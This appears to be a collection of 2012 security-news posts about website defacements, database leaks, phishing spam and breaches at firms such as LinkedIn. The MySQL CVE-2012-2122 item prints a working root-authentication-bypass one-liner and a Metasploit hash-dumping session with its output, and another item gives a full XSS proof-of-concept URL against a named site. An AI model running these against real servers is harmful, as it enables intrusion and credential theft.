“The parties thrive on ignorance and disappointment, and have risen towards power on the wave that was the 2008 economic crisis - just as the NSDAP did during the 30s.”

The first victims of ProjectWestWind, which targets European governments, are a number of state-owned sites from Italy.

One of the targets is the Comune di San Marzano (sanmarzano-ta.gov.it), the site of which has been defaced to display the hackers’ message. Besides altering the website’s main page, Team GhostShell has also leaked more than 100 usernames and password hashes, including the ones of the administrator.

Another target is IV Circolo C.N.Cesaro (cncesaro.gov.it) from which the hackers have leaked 41 record sets comprising usernames, email addresses, names and password hashes.

primocircolovico.gov.it has been taken offline after the group has gained access to their databases, publishing 22 login details and 68 entries from a table named “docent.”

Names, usernames, passwords and email addresses have been also stolen from donmilaninapoli.gov.it, istitutodenicola.gov.it, cavaprimocircolo.gov.it and itimarconi.gov.it, all of them being taken offline.

The Italian government sites haven’t been the only victims of the first phase of ProjectWestWind. The website of the Swedish Vänsterpartiet political party (vansterpartiet.eu) and the one of the Council of Bars and Law Societies of Europe (ccbe.eu) have also been breached. From each of their databases the hackers have made available a handful of login details.

Amazon spam email leads to Blackhole Exploit kit website


Fake amazon notification mails are hitting inboxes and trying to lure recipients into following the links that hosts Blackhole Exploit kit . The email has been spotted by GFI researchers.

The mail may look legitimate . The only thing that gives it away at first glance is the fact that multiple email addresses are included in the "To:" field, and the email is personalized for the first recipient.

The links in the email leads to various legitimate but compromised WordPress domains. Their URLs contain the following section in their syntax:

/wp-content/themes/twentyten/zone(dot)html

Blackhole exploit code tries to exploit the Adobe Reader &Flash , Java vulnerabilities. If you have one of the vulnerable application installed in your system, then the kit will exploit the vulnerability and infects users system.


Intruders break into University of North Florida

The University of North Florida(UNF) has started to sending out email notification to users after they have learned that database containing information about people who submitted contracts to live in the UNF residence halls could have been compromised.

UNF has now secured the servers, but an investigation shows the information could have been accessed as early as spring 2011.  The hacker may compromised the sensitive data includes approximately 23,000 names and Social Security numbers of people who submitted a housing contract between 1997 and spring 2011.

The institution has also made available a frequently asked questions (FAQ) page to offer further clarifications on the incident.

To help the potential victims, UNF is covering the cost of an identity protection service for a period of one year includes Credit report,Daily 3 Bureau Credit Monitoring,Identity Theft Resolution,ExtendCARE and $1 Million Identity Theft Insurance.


"Hello Dear" a DHL notification mail leads malware infection



Epic Failed: A mail that purportedly coming from DHL informs that user delivery Processing complete successfully.  The truth is that the mail is not coming from DHL. If you look into the starting word of the mail, you can easily identify it. The mail starts with "Hello Dear". 

The Spam mail :

Hello Dear,

DHL Express Tracking Notification: Mon, 11 Jun 2012 12:14:55 +0200

Custom Reference: 9057425-HRIEI2E4Q8C
Tracking Number: UT09-2041042911
Pickup Date: Mon, 11 Jun 2012 12:14:55 +0200
Service: AIR/GROUND
Pieces: 2

Mon, 11 Jun 2012 12:14:55 +0200 - Processing complete successfully
PLEASE REFER TO ATTACHED FILE FOR DETAILED INFORMATION.

Shipment status may also be obtained from our Internet site in USA under http://track.dhl-usa.com or Globally under http://www.dhl.com/track

Please do not reply to this email. This is an automated application used only for sending proactive notifications

Thanks in advance,
DHL Express International Inc.

The mail has a zip file attachment which contains malware.Sophos products detect the Windows malware as Troj/Agent-WMO. The attached filename can vary, but takes the form DHL_International_Delivery_Details-[random code].zip.

A typical email has a subject line of "DHL Express Parcel Tracking notification [random code]" or "DHL Express Tracking Notification ID [random code]" or "DHL International Notification for shipment [random code]"


Karachi News website hacked by nyro hacker and Army Of Destruction

A Hacker called as Nyro Hacker break into the Pakistan's Premier News Web Portal , The Karachi News (karachinews.com.pk).  Hacker defaced the website.

At the time of writing this article, the website displays an "under construction message" in the main page.

The mirror of the defacement is available at the zone-h:
http://arab-zone.net/mirror/107910/karachinews.com.pk/


7 Philippines Govt. Sites hacked to protest against anti-hacking bill


The Hacker group called as "PrivateX",a coalition of local hacker groups HukbalaHack,Anonymous, PrivateX and Philkers, hacked Seven Philippines Government websites on Independence Day as a form of protest against new anti-cybercrime bill.

According to GMA News,The websites affected are the City Government of Mandaluyong's website (mandaluyong.gov.ph), the website of the Office of the Ombudsman (omb.gov.ph), the Philippine Anti-Piracy Team website (papt.org.ph).

Philippine Nuclear Research Institute website (pnri.dost.gov.ph), the National Food Authority website (nfa.gov.ph), the Senate Electoral Tribunal website (set.gov.ph), and a Department of Health website (smokefree.gov.ph) have also been breached.

Whenever user access above mentioned websites, the are redirected to a another page that has the defacement message of PrivateX.

The hacktivists fear that in its current form, the bill could be used as “a tool of censorship” which could pose a threat to freedom of expression.

"We're not against the government's intention to combat fraudulence, related forms of it and other serious cyber crimes, but we're absolutely against its provision that has something to do with the internet's freedom of expression (sic)," Hacker said in the defacement page.

OpenVPN official site hacked by HCJ


The official website of OpenVPN has been defaced by hackers apparently led by HcJ. OpenVPN is an open source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities.

Hackers didn't mention the reason for the attack but the wrote the following message in the defacement page "No News Is a Good News "along with a “quote of the day” that read:

Don’t be lammer, Leave your computer and enjoy your summer ./ HcJ"

At the press time, the Website OpenVPN.com has been restored and back to online. The mirror of the defacement is available at Zone-H.

It’s uncertain at this time if the hackers have gained access to information stored in the website’s databases.

The official website of the State of Louisiana hacked by Zer0Pwn

The Hacker known as Zer0Pwn have managed to gain unauthorized access to the official website of the State of Louisiana(Louisiana.gov).

Hacker dumped the compromised database in pastebin. The dump includes emails, passwords, root users, and administrator credentials.

http://pastebin.com/Ubg8GnKG

He also claimed that he found xss vulnerability in SubjectPlus, a web-application software used by mostly educational websites. He posted the proof-of-concept in pastebin.

Alaska.edu vulnerable to SQL injection


A Grey-hat hacker called as 'G4mbi7' discovered SQL Injection vulnerability in the Alaska Volcano Observatory website.

The site is vulnerable to Blind Sql injection ,according to the hacker report. He found this vulnerability a few months ago.

But there is no patch from admin. So he decided to inform about the vulnerability to the admin. He sent a notification with details about the vulnerability. After a week , the admin patched vulnerability.


Flame and Stuxnet malware unleashed by same Master


The Two infamous malwares Flame and Stuxnet are unleashed by same Master, say Kaspersky Labs, who have discovered an identical piece of code in both worms. What appeared to be two unrelated programs are probably part of the same cyberwar campaign.

Experts spotted the Flame malware last month. Intially They didn’t consider the two pieces of malware related because Stuxnet (and Duqu) were created based on the Tilded platform, while Flame was not.

However, as it turns out, researchers  unearthed some previously unknown facts that completely transform the current view of how Stuxnet was created and its link with Flame.

Even though the two viruses are built on completely different platforms and most likely developed independently, they shared key pieces of code during the development process, the security firm explained.

The finding in question relates to “Resource 207,” a module found in earlier versions of Stuxnet that bears a list of “striking resemblance” to Flame, including “names of mutually exclusive objects, the algorithm used to decrypt strings and similar approaches to file naming.”

"The new findings that reveal how the teams shared the source code of at least one module in the early stages of development prove that the groups co-operated at least once," wrote Aleksandr Gostev, chief security expert for Russian security company Kaspersky Labs.

More details about the analysis can be found here.


A critical Security vulnerability in MySQL/MariaDB [CVE-2012-2122]


Security researchers reveal the existence of a serious security vulnerability in MariaDB and MySQL that enables an attacker to gain root access to the database server.Th vulnerability has been assigned to CVE-2012-2122 id;

According to Sergei Golubchik, security coordinator at MariaDB, the flaw doesn’t affect official vendor binaries, but it does expose the customers of MariaDB and MySQL who use versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and prior.


This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>

Caveats and Defense

The first rule of securing MySQL is to not expose to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. In cases where network access must be provided, MySQL also provides host-based access controls. There are few use cases where the MySQL daemon should be intentionally exposed to the wider network and without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:
This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole

msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1

msf auxiliary(mysql_authbypass_hashdump) > run



[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test

[*] 127.0.0.1:3306 Authentication bypass is 10% complete

[*] 127.0.0.1:3306 Authentication bypass is 20% complete

[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts

[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D

[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89

[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

Reference:
Rapid7


NEA.gov & Department of Public Enterprise of South Africa hacked by Zer0Pwn


The hacker known as Zer0Pwn hacked two Government sites and compromised the database belong to. The National Endowment for the Arts and Department of Public Enterprise of South Africa has been exploited via SQL Injection vulnerability.

Hacker dumped the database belong to Department of Public Enterprise of South Africa in pastebin.  The leak contains database details along with username and password details. Unfortunately, the passwords are in plain text.

The dump belong to National Endowment for the Arts website contains MySql Root username ,hashed password and host details.

UACRAO website hacked by Mr. Security

A Hacker called as Mr.Security have hacked into the official site of the Utah Association of Collegiate Registrars and Admissions Officers(UACRAO) and compromised the database.

He dumped the database in Anonpaste. The leak contains username and password details. Also the leak contains the details about the database.

"Things like this happens all day long, every day of the year. Just don't make a mess of it and secure the shit. Times of friendly hackers is over, due to the FBI and police that arrested them. The age of the new hackers, has begon." Hacker said in the leak.


WebSploit Toolkit Version 1.8 Released


Fardin OxOptimOus have released new version 1.8 of Websploit Toolkit. WebSploit Is An Open Source Project For Scan And Analysis Remote System From Vulnerability.

Web Tools Operations Added

  • PHPMyAmin Login Page Finder
  • Directory Scanner
  • Apache User Direcoty Scanner



Fixed Bugs :

  • smal keyboard control bug fixed
  • update bug fixed
  • ettercap path for backbox fixed

Download it from here:
http://sourceforge.net/projects/websploit/files/latest/download


League of Legends Online game website hacked


Hackers breached the official website of Online real-time strategy game League of Legends(from Riot Games). Riot Games issued a security warning in their official site.

According to the statement, the Hackers gained access to certain personal player data contained in certain EU West and EU Nordic & East databases .


"The most critical data accessed included email address, encrypted account password, summoner name, date of birth, and – for a small number of players – first and last name and encrypted security question and answer." The statement reads.

"Absolutely no payment or billing information of any kind was included in the breach"

After further investigation, they determined that more than half of the passwords were simple enough to be at risk of easy cracking. As a security precaution, Riot Games sent an email to all players on these platforms.  The fixed the specific security issue that hacker exploited.

eHarmony Works with Law Enforcement in Password Leak Investigation

After the database leak from eHarmony wesbite, eHarmony released an update statement saying that they are investigating the hack with the help of law enforcement authorities.


“We have also been working with law enforcement authorities in our investigation and have been in touch with one of the other companies affected as well,” eHarmony’s Blog post reads.

Similar to LinkedIn and Last.fm, eHarmony is also reluctant in providing exact details. However, they’ve taken certain steps to remove the risks posed by the incident.

While they fail to provide the exact number of impacted individuals, they highlight the fact that the “small percentage of affected accounts” have been secured by disabling their passwords.

They sent an email to all affected members and provided them with specific instructions on how to change their password and tips on how to create a robust password. The email also included a direct phone number and live online chat access to our Customer Care team so we could personally address concerns and questions.

XSS Vulnerability found in 4 Antivirus websites



A Security Researcher Ankit Sharma has discovered Cross Site scripting vulnerability in four Antivirus websites.

The official websites belong to BitDefender , AVG, Avira and Total Defense Antivirus are vulnerable to xss.



In BitDefender TrafficLight , the URL input is not filtering the XSS. The Url input allows hackers to run malicious xss code. It can results in phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E




50+ Pakistani sites hacked by Silent Hacker from indishell

Hacker called as 'Silent Hacker', from Indian Hacker group 'indiShell', have hacked into more than 50 Pakistani sites that includes some high profile sites.  Hacker defaced all websites.

Sites :-

http://www.nibd.edu.pk/
http://www.aicable.org/
http://www.doodlebug.pk/
http://www.funfrooz.com/
http://www.futurelinkspk.com/
http://www.gegabyte.org/
http://www.hellojuniors.com/
http://www.iffhamulquran.com/
http://ibdlp.com/
http://ghuncha.com/
http://www.imisoftwaresolutions.com/
http://infotainment-review.com/
http://www.kamalalmimar.com/
http://kashifashion.com/
http://www.kenzaacademy.com/
http://khatm-e-nabuwwat.com/
http://www.k2international.com.pk/
http://www.literaturegala.com/
http://lsws.org/
http://www.madnimedia.com/
http://massiverentrollgrowth.com/
http://www.megaengineering.com.pk/
http://naziaz.com/
http://www.nfrmg.org/
http://www.okpankpoaro.org/
http://www.pajamajokes.com/
http://www.onlineinternetmarketer.com/
http://www.pharmaplusplus.com/
http://www.ptftennis.net/
http://www.remotefoundation.org/
http://rifintl.net/
http://www.scholarship.pk/
http://www.sciaticacuretreatment.com/
http://www.shancontrols.com/
http://www.shaziabeauty.com/
http://www.southcity.edu.pk/
http://www.sss-afg.com/
http://mpisystems.net/
http://www.tabsmedia.com/
http://www.tareef.org/
http://www.theaccomplishedprofessional.com/
http://www.themakerz.com/
http://www.timenspacemedia.com/
http://tuffit.net/
http://urdupoetryandlitraturevideos.com/
http://waqarhameed.com/
http://www.web4beautytips.com/
http://jdevelopers.net/
http://nooralamkhan.com/
http://www.zecpk.com/
http://www.jhelumtime.com/
http://freelaptopdrivers.net/
http://www.socialinnovations.pk/
http://www.doodlebug.pk/
http://www.halaalfoundation.com/

Mirrors :-

http://arab-zone.net/mirror/101603/kashifashion.com/
http://arab-zone.net/mirror/101600/imisoftwaresolutions.com/
http://arab-zone.net/mirror/101601/infotainment-review.com/
http://arab-zone.net/mirror/101599/ghuncha.com/
http://arab-zone.net/mirror/101598/ibdlp.com/
http://arab-zone.net/mirror/101596/hellojuniors.com/
http://arab-zone.net/mirror/101597/iffhamulquran.com/
http://arab-zone.net/mirror/101595/gegabyte.org/
http://arab-zone.net/mirror/101594/futurelinkspk.com/
http://arab-zone.net/mirror/101593/funfrooz.com/
http://arab-zone.net/mirror/101592/aicable.org/
http://arab-zone.net/mirror/101591/nibd.edu.pk/
http://arab-zone.net/mirror/101590/arab-zone.net/mirror/92688/halaalfoundation.com/
http://arab-zone.net/mirror/101589/halaalfoundation.com/
http://arab-zone.net/mirror/101588/socialinnovations.pk/
http://arab-zone.net/mirror/101586/jhelumtime.com/
http://arab-zone.net/mirror/101587/freelaptopdrivers.net/
http://arab-zone.net/mirror/101584/nooralamkhan.com/
http://arab-zone.net/mirror/101585/zecpk.com/
http://arab-zone.net/mirror/101583/jdevelopers.net/
http://arab-zone.net/mirror/101580/urdupoetryandlitraturevideos.com/
http://arab-zone.net/mirror/101581/waqarhameed.com/
http://arab-zone.net/mirror/101578/timenspacemedia.com/
http://arab-zone.net/mirror/101579/tuffit.net/
http://arab-zone.net/mirror/101576/theaccomplishedprofessional.com/
http://arab-zone.net/mirror/101575/tareef.org/
http://arab-zone.net/mirror/101574/tabsmedia.com/
http://arab-zone.net/mirror/101572/sss-afg.com/
http://arab-zone.net/mirror/101609/madnimedia.com/
http://arab-zone.net/mirror/101610/massiverentrollgrowth.com/
http://arab-zone.net/mirror/101606/k2international.com.pk/
http://arab-zone.net/mirror/101605/khatm-e-nabuwwat.com/
http://arab-zone.net/mirror/101604/kenzaacademy.com/
http://arab-zone.net/mirror/101607/literaturegala.com/

“t0pp8uzz” and “GM” Sentenced to Jail for Running Fraud Website

Jay Moore, known by his online moniker as t0pp8uzz, and his accomplice Damian Horne, aka GM, have been sentenced to jail after investigators accused them of running a fraud website worth an estimate of £26.9 million ($41 million or 33.2 million EUR).

According to UK’s Serious Organized Crime Agency (SOCA) Moore pleaded guilty to 12 fraud-related charges, hacking, and money laundering and received a 3-year jail sentence. Horne received 21 months after he also pleaded guilty.

The fraudsters managed to earn a lot of money after Moore (photo) launched the Freshshop, a site that intermediated the sale of stolen financial information. Horne was his right-hand man, in charge of “assisting” him.

They started timidly with selling stolen iTunes vouchers and online gaming codes on eBay, but soon enough they expanded their criminal activities to commercializing credit card details. To reach their goals, they relied on a network of bank accounts, online financial institutions and money exchange companies from abroad.

The Freshshop the cybercriminals were running looked like any other online retail store, but instead of the usual items, they were actually selling credit card data.

The valuable information was obtained not only from their own hacking operations, but also from other individuals who were looking for a way to sell the data they had stolen by breaching websites.

When authorities raided Moore’s home back in 2011, they found tens of thousands of pounds in cash, along with a number of computers connected to the Freshshop. They also found the card details of around 340,000 individuals.

He apparently gave his father around £40,000 (49,000 EUR or $61,000) to help him purchase a farm house and he bought a luxury car for himself. The fraudster told his parents that the money came from his apparently legit web design business.

Besides Moore and Horne, investigators have identified two other individuals, friends with the mastermind, who have been recruited to collect money from Western Union locations in Bristol.

Currently, SOCA is trying to identify the other cybercriminals who have been using the fraud site.

[source]

16th June 2012 null Bangalore Monthly meetup

Hi All,

We will have this month's null/OWASP/Garage4hackers/SecurityXploded
Bangalore meetup on Saturday 16th June 2012 starting at 10:00 AM. No
registrations, no fees, just come with an open mind :)

The Bangalore meet, as usual, is divided into 2 parts, the monthly
talks and the Training on Reverse Engineering. The Reverse Engineering
training will start at 12:45 PM by the SecurityXploded/
Garage4Hackers team.

Also, as discussed in the last month's meet, we will have a basic 30
minute primer on SQL Injection by Satish at 9:30 AM, before the main
talks begin at 10:00 AM. All those who would be interested to learn,
understand the basics of SQL Injection and to watch some cool demos
are requested to be present at 9:30 AM.

TALKS
1. News Bytes - Sumeer
2. JavaScript Obfuscation - Prasanna
3. SSL VPNs - Rajesh

12:45 PM onwards:
4. Practical Reversing: Part3 - Memory Forensics - Monnappa


VENUE DETAILS
Kieon, 3rd Floor, 302 Prestige Sigma,
3 Vittal Mallya Road,
Bangalore 560001
Opposite Bishop Cottons Girls School, Above Emirates Airlines office.

Map Location: http://g.co/maps/dahhv

Parking is available in the building. See you there.

Last.fm hacked and passwords leaked


Music-streaming website, Last.fm, has issued a warning to its users to change their password immediately after the password leak.

"We are currently investigating the leak of some Last.fm user passwords." The firm said in a note on its website.

" This follows recent password leaks on other sites, as well as information posted online. As a precautionary measure, we’re asking all our users to change their passwords immediately."


The site recommend users to change their password on setting page. Also ,the site said it doesn't email customers with direct links to update settings or provide passwords. Any emails that purport to be from Last.fm requesting information are likely phishing messages from scammers after your personal information.

"We’re sorry for the inconvenience around changing your password; Last.fm takes your privacy very seriously. We’ll be posting updates in our forums and via our Twitter account (@lastfm) as we get to the bottom of this."


Serbian Bank website hacked by Sepo


A Hacker known as SEPO(‏@anon_4freedom) hacked the Serbian Bank website(www.srpskabanka.rs) and compromised the database belong to.

Serbian bank s.c. has been present at domestic financial market for several decades and, as such, is considered to be one of the most important institutions in corporate and retail business. Developed from the Military Department of the National Bank of Yugoslavia, which has provided services to the entire Yugoslav military industry, the Bank has conducted its operations under the name of Yu Garant Banka for short period of time and since 2003 operates under the present name.

He dumped the database in his own website. The leak contains confidential data including username, hashed passswords and the database details.



AT&T Hacked by Team Digi7al ‏

The Hacker collective known as 'TeamDigi7al' claims that they got unauthorized access to the AT&T website and compromised the database.

Hacker leaked the part of stolen data in the text format. The leak contains personal details including name, address, mobile number and email address. Also they leaked the details about the vulnerability and database details.

"Well it just goes to show you, anything is vulnerable. You just have to know where to look." Hacker said.

"The information in this dump isn't even 1% of whats in here, I just didn't feel like dumping tens of thousands of names, emails, addresses, mobile numbers (you get my point)."

LinkedIn confirms some passwords have been compromised

LinkedIn confirmed that the passwords belonging to "some" of its members have been compromised.
"We can confirm that some of the passwords that were compromised correspond to LinkedIn accounts. We are continuing to investigate this situation"LinkedIn blog post reads.

Affected members will receive an email with instructions on how to reset their passwords; current passwords will not work. They will also receive an email that provides a bit more context on this situation and why they are being asked to change their passwords.

The company did not confirm how many passwords were involved, though it reportedly affected about 6 million of LinkedIn's 161 million users.

8 more Pakistan sites hacked by Nyro Hacker

A Hacker called as 'Nyro Hacker' hacked eight more Pakistan websites and defaced them.

list of hacked sites:
http://diy-home-decor.com/
http://healthadvise.net/
http://www.hiblarious.com/
http://iphonenipad.com/
http://www.futurelinkspk.com/
http://jobsinterviewguide.com/
http://www.sigmasem.com/
http://fashionworldsource.com/

Mirrors

http://arab-zone.net/mirror/101350/sigmasem.com/
http://arab-zone.net/mirror/101351/fashionworldsource.com/
http://arab-zone.net/mirror/101349/jobsinterviewguide.com/
http://arab-zone.net/mirror/101347/iphonenipad.com/
http://arab-zone.net/mirror/101348/futurelinkspk.com/
http://arab-zone.net/mirror/101346/healthadvise.net/

At the time of writing , visiting the above mentioned sites asks for password.